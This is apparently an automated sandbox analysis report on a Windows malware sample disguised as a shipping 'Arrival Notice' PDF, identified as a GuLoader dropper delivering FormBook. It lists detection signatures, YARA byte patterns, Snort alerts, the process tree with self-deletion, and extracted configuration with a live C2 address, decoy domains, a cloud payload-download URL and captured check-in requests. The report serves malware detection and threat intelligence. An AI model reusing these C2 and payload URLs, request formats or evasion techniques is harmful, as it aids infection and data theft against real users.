Play interactive tourEdit tour

Windows Analysis Report Arrival Notice, CIA Awb Inv Form.pdf.exe

Overview

General Information

 Sample Name: Arrival Notice, CIA Awb Inv Form.pdf.exe Analysis ID: 527894 MD5: ff71941571d8930c1125b3931d400d86 SHA1: 0a417bf568a5978777021e433bf4693893facd3e SHA256: bf952f1cd44de7bf63c63e502670d3a6a97eca1b5f7fd9981ed0d235351e975f Infos: Most interesting Screenshot:

Detection

 Score: 100 Range: 0 - 100 Whitelisted: false Confidence: 100%

Signatures

Found malware configuration
Sigma detected: Suspicious Double Extension
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Generic Dropper
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Hides threads from debuggers
Sample uses process hollowing technique
Uses netstat to query active network connections and open ports
Maps a DLL or memory area into another process
Initial sample is a PE file and has a suspicious name
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Modifies the prolog of user mode functions (user mode inline hooks)
Self deletion via cmd delete
Queues an APC in another process (thread injection)
Modifies the context of a thread in another process (thread injection)
Executable has a suspicious name (potential lure to open the executable)
C2 URLs / IPs found in malware configuration
Uses an obfuscated file name to hide its real file extension (double extension)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Creates processes with suspicious names
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
PE / OLE file has an invalid certificate
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

 System is w10x64nativeArrival Notice, CIA Awb Inv Form.pdf.exe (PID: 4636 cmdline: "C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe" MD5: FF71941571D8930C1125B3931D400D86)Arrival Notice, CIA Awb Inv Form.pdf.exe (PID: 7132 cmdline: "C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe" MD5: FF71941571D8930C1125B3931D400D86)explorer.exe (PID: 4672 cmdline: C:\Windows\Explorer.EXE MD5: 5EA66FF5AE5612F921BC9DA23BAC95F7)NETSTAT.EXE (PID: 5904 cmdline: C:\Windows\SysWOW64\NETSTAT.EXE MD5: 9DB170ED520A6DD57B5AC92EC537368A)cmd.exe (PID: 3516 cmdline: /c del "C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)conhost.exe (PID: 1324 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)cleanup
``{"Payload URL": "https://drive.google.com/uc?export=download&id=16igyruBe"}``
``{"C2 list": ["www.papllc.biz/s3f1/"], "decoy": ["teslaislandbois.com", "teslafreesuperchargermiles.com", "wifibudddy.sbs", "spmr.tv", "rossatospa.com", "crypto-cardano.com", "mvsteals.com", "amazonsellwithdiscount.com", "safety1-venture.us", "hara.cloud", "musee-radix-hairsalon.com", "celsb.com", "leaureveedhubert.com", "bncmobile.com", "bptrix.xyz", "wawadecoration.com", "redirect-amazones.com", "baseballinformatics.com", "predator.rest", "heinzelmaennchenltd.net", "metafacebookmessenger.com", "izivente.com", "evaccines.com", "alexacoyne.com", "emansdesign.com", "donefirsr.com", "ramel.us", "homie-hairsalon.com", "renatotomatis.com", "thecryptofirm.us", "4mtechmachines.com", "thaicharuen.com", "alexanderferency.com", "facebook-meta-morphosis.com", "spaziofellowes.com", "eggchanceapple.top", "trust2-profit.us", "investmenofpairs.club", "a.town", "soarlikeaneagle.site", "itssscraftingxo.com", "721369.online", "cornershopgoodwill.com", "programagubernamental.xyz", "siluca.biz", "rivianhawaii.com", "c2sh32.com", "meta-facebook.net", "amazonasmidia.com", "tmjuber.com", "venomous.kr", "stratosbuilder.com", "unitedlegalsolutions.us", "qivem.top", "federal-funds-deposit.com", "morningstarapparel.space", "verlag.us", "wwwdonefirst.com", "meta-morphosisfacebook.com", "mvrsfacebook.ca", "founditonamazon.net", "shellyperkowski.com", "firstsolar-s.com", "viiew.co"]}``
SourceRuleDescriptionAuthorStrings
00000007.00000000.22694456011.000000000A598000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
00000007.00000000.22694456011.000000000A598000.00000040.00020000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
• 0x5839:\$sqlite3step: 68 34 1C 7B E1
• 0x594c:\$sqlite3step: 68 34 1C 7B E1
• 0x5868:\$sqlite3text: 68 38 2A 90 C5
• 0x598d:\$sqlite3text: 68 38 2A 90 C5
• 0x587b:\$sqlite3blob: 68 53 D8 7F 8C
• 0x59a3:\$sqlite3blob: 68 53 D8 7F 8C
00000007.00000000.22694456011.000000000A598000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
• 0x26a5:\$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
• 0x2191:\$sequence_2: 3B 4F 14 73 95 85 C9 74 91
• 0x27a7:\$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
• 0x291f:\$sequence_4: 5D C3 8D 50 7C 80 FA 07
• 0x140c:\$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
• 0x8917:\$sequence_8: 3C 54 74 04 3C 74 75 F4
• 0x991a:\$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000008.00000002.26929044585.00000000034CF000.00000004.00020000.sdmpLokiBot_Dropper_Packed_R11_Feb18Auto-generated rule - file scan copy.pdf.r11Florian Roth
• 0x1c418:\$s1: C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB
00000008.00000002.26923234058.0000000002962000.00000004.00000020.sdmpLokiBot_Dropper_Packed_R11_Feb18Auto-generated rule - file scan copy.pdf.r11Florian Roth
• 0x1c410:\$s1: C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB
Click to see the 22 entries

Sigma Overview

System Summary:

 Sigma detected: Suspicious Double Extension Show sources
 Source: Process started Author: Florian Roth (rule), @blu3_team (idea): Data: Command: "C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe" , CommandLine: "C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe, NewProcessName: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe, OriginalFileName: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe, ParentCommandLine: "C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe" , ParentImage: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe, ParentProcessId: 4636, ProcessCommandLine: "C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe" , ProcessId: 7132

Jbx Signature Overview

AV Detection:

 Found malware configuration Show sources
 Source: 00000006.00000002.22826427639.000000001E760000.00000040.00020000.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.papllc.biz/s3f1/"], "decoy": ["teslaislandbois.com", "teslafreesuperchargermiles.com", "wifibudddy.sbs", "spmr.tv", "rossatospa.com", "crypto-cardano.com", "mvsteals.com", "amazonsellwithdiscount.com", "safety1-venture.us", "hara.cloud", "musee-radix-hairsalon.com", "celsb.com", "leaureveedhubert.com", "bncmobile.com", "bptrix.xyz", "wawadecoration.com", "redirect-amazones.com", "baseballinformatics.com", "predator.rest", "heinzelmaennchenltd.net", "metafacebookmessenger.com", "izivente.com", "evaccines.com", "alexacoyne.com", "emansdesign.com", "donefirsr.com", "ramel.us", "homie-hairsalon.com", "renatotomatis.com", "thecryptofirm.us", "4mtechmachines.com", "thaicharuen.com", "alexanderferency.com", "facebook-meta-morphosis.com", "spaziofellowes.com", "eggchanceapple.top", "trust2-profit.us", "investmenofpairs.club", "a.town", "soarlikeaneagle.site", "itssscraftingxo.com", "721369.online", "cornershopgoodwill.com", "programagubernamental.xyz", "siluca.biz", "rivianhawaii.com", "c2sh32.com", "meta-facebook.net", "amazonasmidia.com", "tmjuber.com", "venomous.kr", "stratosbuilder.com", "unitedlegalsolutions.us", "qivem.top", "federal-funds-deposit.com", "morningstarapparel.space", "verlag.us", "wwwdonefirst.com", "meta-morphosisfacebook.com", "mvrsfacebook.ca", "founditonamazon.net", "shellyperkowski.com", "firstsolar-s.com", "viiew.co"]} Source: 00000006.00000000.22299792619.0000000000560000.00000040.00000001.sdmp Malware Configuration Extractor: GuLoader {"Payload URL": "https://drive.google.com/uc?export=download&id=16igyruBe"}
 Multi AV Scanner detection for submitted file Show sources
 Source: Arrival Notice, CIA Awb Inv Form.pdf.exe Virustotal: Detection: 37% Perma Link Source: Arrival Notice, CIA Awb Inv Form.pdf.exe ReversingLabs: Detection: 31%
 Yara detected FormBook Show sources
 Source: Yara match File source: 00000007.00000000.22694456011.000000000A598000.00000040.00020000.sdmp, type: MEMORY Source: Yara match File source: 00000006.00000002.22826427639.000000001E760000.00000040.00020000.sdmp, type: MEMORY Source: Yara match File source: 00000008.00000002.26922800429.0000000002800000.00000040.00020000.sdmp, type: MEMORY Source: Yara match File source: 00000008.00000002.26924489179.0000000002D00000.00000040.00020000.sdmp, type: MEMORY Source: Yara match File source: 00000008.00000002.26924755438.0000000002D30000.00000004.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000007.00000000.22745903057.000000000A598000.00000040.00020000.sdmp, type: MEMORY Source: Yara match File source: 00000006.00000002.22815363833.00000000000A0000.00000040.00020000.sdmp, type: MEMORY
 Uses 32bit PE files Show sources
 Source: Arrival Notice, CIA Awb Inv Form.pdf.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
 Uses secure TLS version for HTTPS connections Show sources
 Source: unknown HTTPS traffic detected: 142.250.185.110:443 -> 192.168.11.20:49805 version: TLS 1.2 Source: unknown HTTPS traffic detected: 142.250.186.97:443 -> 192.168.11.20:49806 version: TLS 1.2
 Binary contains paths to debug symbols Show sources
 Source: Binary string: netstat.pdbGCTL source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22815632150.00000000000D0000.00000040.00020000.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22817948839.0000000000981000.00000004.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22826316782.000000001E660000.00000004.00000001.sdmp Source: Binary string: netstat.pdb source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22815632150.00000000000D0000.00000040.00020000.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22817948839.0000000000981000.00000004.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22826316782.000000001E660000.00000004.00000001.sdmp Source: Binary string: wntdll.pdbUGP source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22827147286.000000001E9C0000.00000040.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22829090825.000000001EAED000.00000040.00000001.sdmp, NETSTAT.EXE, 00000008.00000002.26925337058.0000000002F80000.00000040.00000001.sdmp, NETSTAT.EXE, 00000008.00000002.26926665832.00000000030AD000.00000040.00000001.sdmp Source: Binary string: wntdll.pdb source: Arrival Notice, CIA Awb Inv Form.pdf.exe, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22827147286.000000001E9C0000.00000040.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22829090825.000000001EAED000.00000040.00000001.sdmp, NETSTAT.EXE, NETSTAT.EXE, 00000008.00000002.26925337058.0000000002F80000.00000040.00000001.sdmp, NETSTAT.EXE, 00000008.00000002.26926665832.00000000030AD000.00000040.00000001.sdmp
 Found inlined nop instructions (likely shell or obfuscated code) Show sources
 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4x nop then pop esi 8_2_0281731A

Networking:

 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) Show sources
 Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49816 -> 34.102.136.180:80 Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49816 -> 34.102.136.180:80 Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49816 -> 34.102.136.180:80 Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49821 -> 35.198.112.85:80 Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49821 -> 35.198.112.85:80 Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49821 -> 35.198.112.85:80 Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49826 -> 184.168.98.97:80 Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49826 -> 184.168.98.97:80 Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49826 -> 184.168.98.97:80 Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49827 -> 34.102.136.180:80 Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49827 -> 34.102.136.180:80 Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49827 -> 34.102.136.180:80
 System process connects to network (likely due to code injection or exploit) Show sources
 Source: C:\Windows\explorer.exe Network Connect: 154.94.229.8 80 Jump to behavior Source: C:\Windows\explorer.exe Network Connect: 107.178.157.225 80 Jump to behavior Source: C:\Windows\explorer.exe Network Connect: 3.64.163.50 80 Jump to behavior Source: C:\Windows\explorer.exe Network Connect: 35.198.112.85 80 Jump to behavior Source: C:\Windows\explorer.exe Network Connect: 70.40.220.123 80 Jump to behavior Source: C:\Windows\explorer.exe Network Connect: 183.181.99.12 80 Jump to behavior Source: C:\Windows\explorer.exe Network Connect: 184.168.98.97 80 Jump to behavior Source: C:\Windows\explorer.exe Network Connect: 34.102.136.180 80 Jump to behavior Source: C:\Windows\explorer.exe Network Connect: 64.190.62.111 80 Jump to behavior
 Uses netstat to query active network connections and open ports Show sources
 Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
 C2 URLs / IPs found in malware configuration Show sources
 Source: Malware configuration extractor URLs: https://drive.google.com/uc?export=download&id=16igyruBe Source: Malware configuration extractor URLs: www.papllc.biz/s3f1/
 Internet Provider seen in connection with other malware Show sources
 Source: Joe Sandbox View ASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US Source: Joe Sandbox View ASN Name: ROOTNETWORKSUS ROOTNETWORKSUS
 JA3 SSL client fingerprint seen in connection with other malware Show sources
 Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
 HTTP GET or POST without a user agent Show sources
 Source: global traffic HTTP traffic detected: GET /s3f1/?0v=PTZX9bbDrHz+cSGvcymGk0mts24461Z1qQ1nyKxozOrcJ62jRcnhMEjPJVIjYEdLVzgY&kTGXE2=5jpDxBr8jNJ0VnGP HTTP/1.1Host: www.izivente.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /s3f1/?0v=djAV39Fd+2tTaJZ0vMg9wx3f2dAzn5uoNnRL0R1SzoIuCwqtHRucI/njP/LN+anlykG6&kTGXE2=5jpDxBr8jNJ0VnGP HTTP/1.1Host: www.musee-radix-hairsalon.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /s3f1/?0v=sqInqd/J1oF05xIRIYy6fIocxGbhQvf/UJ8WsTvvwcutrQRehAYuBiNZHMXnLC/ELIDP&kTGXE2=5jpDxBr8jNJ0VnGP HTTP/1.1Host: www.teslafreesuperchargermiles.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /s3f1/?0v=SHCw80AJpwYBr9Gcy19d9t3wNH3OULHDJ3WoL9xOYwR6hbrNjBBxIJP5Ay3SVk+aC6rM&kTGXE2=5jpDxBr8jNJ0VnGP HTTP/1.1Host: www.mvsteals.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /s3f1/?0v=mH/60k+8QaINko6jE2QpZl5PE74OV+HVH/ClSiWHQSmVZS7BQfRqR+Cg+8qmWPEHLuT3&kTGXE2=5jpDxBr8jNJ0VnGP HTTP/1.1Host: www.thaicharuen.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /s3f1/?0v=UFnETU8dieTu408infxPFcIZ9A51JABruIfjxtzTo70f1rUHWxHKXlzNhsAQN9Kxpi4c&kTGXE2=5jpDxBr8jNJ0VnGP HTTP/1.1Host: www.morningstarapparel.spaceConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /s3f1/?0v=09o28MjQy1cZQ5Pjj+CLcbQvMAiWJGV2Uxg7+ScaYTXEQUafs3S8SGgaduHkLU6DHZH5&kTGXE2=5jpDxBr8jNJ0VnGP HTTP/1.1Host: www.soarlikeaneagle.siteConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /s3f1/?0v=mbzqDKJ3zGVZXRXzBR45Cgdnnesr2+nRJSwniRIMGUaPxNPQA+ji5LfWApDcm/CqO18J&kTGXE2=5jpDxBr8jNJ0VnGP HTTP/1.1Host: www.evaccines.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /s3f1/?0v=NBR0aPdzKjxBJ/qIBF///end99Hz3MSBKbZXqSBgBb5XrtkET9he0lXIERUBepCdWUFS&kTGXE2=5jpDxBr8jNJ0VnGP HTTP/1.1Host: www.celsb.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /s3f1/?0v=d8/OqiJyMkDaGTNTMgoxgiTtJv1BTsaVDDjuqFtpNub02Pcaaru29SvOabQgh8wWKZWy&hXeT=Wxlp HTTP/1.1Host: www.4mtechmachines.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /s3f1/?0v=F/pbsBegFO7o3fLKo/FzEC9ZwTRXzaIgUSgpsvNThmOurZQxU5rRi5MGW6g3EwPdsbP6&hXeT=Wxlp HTTP/1.1Host: www.hara.cloudConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
 IP address seen in connection with other malware Show sources
 Source: Joe Sandbox View IP Address: 64.190.62.111 64.190.62.111
 Uses a known web browser user agent for HTTP communication Show sources
 Source: global traffic HTTP traffic detected: GET /uc?export=download&id=16igyruBeyi1SLH2lfqbjS2ggty9bFGFC HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache Source: global traffic HTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/nqfdtgt678la5ha3g2tbhed40e9h4e57/1637762850000/13904828925096904893/*/16igyruBeyi1SLH2lfqbjS2ggty9bFGFC?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-14-5s-docs.googleusercontent.comConnection: Keep-Alive
 Uses HTTPS Show sources
 Source: unknown Network traffic detected: HTTP traffic on port 49805 -> 443 Source: unknown Network traffic detected: HTTP traffic on port 49806 -> 443 Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49806 Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49805
 Tries to download or post to a non-existing HTTP route (HTTP/1.1 404 Not Found / 503 Service Unavailable / 403 Forbidden) Show sources
 Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Wed, 24 Nov 2021 14:09:53 GMTContent-Type: text/htmlContent-Length: 275ETag: "6197bde3-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: Forbidden

Access Forbidden

Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Wed, 24 Nov 2021 14:10:33 GMTContent-Type: text/htmlContent-Length: 275ETag: "618be74a-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: Forbidden

Access Forbidden

Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 24 Nov 2021 14:12:17 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: 404 Not Found

The requested URL was not found on this server.

Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.

Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Wed, 24 Nov 2021 14:14:34 GMTContent-Type: text/htmlContent-Length: 275ETag: "61951b77-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: Forbidden

Access Forbidden

 Connects to IPs without corresponding DNS lookups Show sources
 Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1 Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1 Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1 Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1 Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1 Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1 Source: unknown UDP traffic detected without corresponding DNS query: 9.9.9.9 Source: unknown UDP traffic detected without corresponding DNS query: 9.9.9.9 Source: unknown UDP traffic detected without corresponding DNS query: 9.9.9.9 Source: unknown UDP traffic detected without corresponding DNS query: 9.9.9.9 Source: unknown UDP traffic detected without corresponding DNS query: 9.9.9.9 Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1 Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1 Source: unknown UDP traffic detected without corresponding DNS query: 9.9.9.9 Source: unknown UDP traffic detected without corresponding DNS query: 9.9.9.9 Source: unknown UDP traffic detected without corresponding DNS query: 9.9.9.9 Source: unknown UDP traffic detected without corresponding DNS query: 9.9.9.9 Source: unknown UDP traffic detected without corresponding DNS query: 9.9.9.9 Source: unknown UDP traffic detected without corresponding DNS query: 9.9.9.9 Source: unknown UDP traffic detected without corresponding DNS query: 9.9.9.9 Source: unknown UDP traffic detected without corresponding DNS query: 9.9.9.9 Source: unknown UDP traffic detected without corresponding DNS query: 9.9.9.9 Source: unknown UDP traffic detected without corresponding DNS query: 9.9.9.9
 URLs found in memory or binary data Show sources